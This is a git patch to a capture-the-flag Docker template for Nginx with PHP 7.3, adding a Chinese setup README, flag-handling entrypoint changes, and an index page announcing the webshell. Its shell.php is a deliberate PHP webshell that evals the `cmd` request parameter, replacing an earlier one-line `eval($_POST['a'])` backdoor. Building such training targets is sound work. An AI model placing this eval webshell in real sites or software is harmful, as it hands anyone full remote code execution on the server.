From 1f673bc92f06fdd1fcb5c8d2dc9fc6897903b833 Mon Sep 17 00:00:00 2001
From: Randark_JMT <randark@foxmail.com>
Date: Mon, 23 Oct 2023 15:46:56 +0000
Subject: [PATCH] update web-nginx-php73

---
 web-nginx-php73/README.md                    | 29 +++++++++++++++++++-
 web-nginx-php73/service/docker-entrypoint.sh |  7 ++---
 web-nginx-php73/src/flag.php                 |  1 +
 web-nginx-php73/src/index.php                | 16 +++++++++--
 web-nginx-php73/src/shell.php                | 15 +++++++++-
 5 files changed, 59 insertions(+), 9 deletions(-)

diff --git a/web-nginx-php73/README.md b/web-nginx-php73/README.md
index 7699c9e..e2ac340 100644
--- a/web-nginx-php73/README.md
+++ b/web-nginx-php73/README.md
@@ -1,3 +1,30 @@
 # web-nginx-php73
 
-部分容器逻辑参考自：[CTFTraining / base_image_nginx_php_73](https://github.com/CTFTraining/base_image_nginx_php_73)，在此感谢[陌竹 - mozhu1024](https://github.com/mozhu1024)师傅做出的贡献
\ No newline at end of file
+部分容器逻辑参考自：[CTFTraining / base_image_nginx_php_73](https://github.com/CTFTraining/base_image_nginx_php_73)，在此感谢 [陌竹 - mozhu1024](https://github.com/mozhu1024) 师傅做出的贡献
+
+## 环境说明
+
+提供 `Nginx` +`PHP 7.3.33` 的基础环境，默认暴露端口位于 80
+
+> 请注意 !!!
+>
+> 需要注意的是，模板默认会将 flag 保存在 / flag 文件中，如果 PHP 项目中需要直接从环境变量中读取 flag 数据，请在./service/docker-entrypoint.sh 中修改相关操作语句
+
+## 如何使用
+
+直接将 PHP 项目放入 `./src` 目录即可
+
+源码放置进 `./src` 目录之后，执行
+
+```shell
+docker build .
+```
+
+即可开始编译镜像
+
+也可以在安放好相关项目文件之后，直接使用 `./docker/docker-compose.yml` 内的 `docker-compose` 文件实现一键启动测试容器
+
+```shell
+cd ./docker
+docker-compose up -d
+```
diff --git a/web-nginx-php73/service/docker-entrypoint.sh b/web-nginx-php73/service/docker-entrypoint.sh
index 5c67973..daaa44f 100644
--- a/web-nginx-php73/service/docker-entrypoint.sh
+++ b/web-nginx-php73/service/docker-entrypoint.sh
@@ -4,6 +4,7 @@
 user=$(ls /home)
 
 # Check the environment variables for the flag and assign to INSERT_FLAG
+# 需要注意，以下语句会将FLAG相关传递变量进行覆盖，如果需要，请注意修改相关操作
 if [ "$DASFLAG" ]; then
     INSERT_FLAG="$DASFLAG"
     export DASFLAG=no_FLAG
@@ -25,10 +26,8 @@ echo $INSERT_FLAG | tee /flag
 
 chmod 744 /flag
 
-php-fpm &
-
-nginx &
+php-fpm & nginx &
 
 echo "Running..."
 
-tail -F /dev/null
\ No newline at end of file
+tail -F /var/log/nginx/access.log /var/log/nginx/error.log
\ No newline at end of file
diff --git a/web-nginx-php73/src/flag.php b/web-nginx-php73/src/flag.php
index ba92355..8865a6e 100644
--- a/web-nginx-php73/src/flag.php
+++ b/web-nginx-php73/src/flag.php
@@ -6,3 +6,4 @@
 else{
     echo "error";
 }
+echo $flag;
diff --git a/web-nginx-php73/src/index.php b/web-nginx-php73/src/index.php
index 1a12891..8802883 100644
--- a/web-nginx-php73/src/index.php
+++ b/web-nginx-php73/src/index.php
@@ -1,3 +1,13 @@
-<?php
-include 'flag.php';
-echo $flag;
+<pre>
+
+      ____ _____ _____       _             _     _                
+     / ___|_   _|  ___|     / \   _ __ ___| |__ (_)_   _____  ___ 
+    | |     | | | |_ _____ / _ \ | '__/ __| '_ \| \ \ / / _ \/ __|
+    | |___  | | |  _|_____/ ___ \| | | (__| | | | |\ V /  __/\__ \
+     \____| |_| |_|      /_/   \_\_|  \___|_| |_|_| \_/ \___||___/
+
+
+</pre>
+
+<h3> Webshell is in /shell.php </h3>
+<h3> flag is in /flag.php </h3>
diff --git a/web-nginx-php73/src/shell.php b/web-nginx-php73/src/shell.php
index f1e6928..d6cb477 100644
--- a/web-nginx-php73/src/shell.php
+++ b/web-nginx-php73/src/shell.php
@@ -1 +1,14 @@
-<?php @eval($_POST['a']) ?>
\ No newline at end of file
+<?php
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        @eval($cmd);
+        echo "</pre>";
+        die;
+}
+else{
+    show_source(__FILE__);
+    phpinfo();
+}
+
+?>
\ No newline at end of file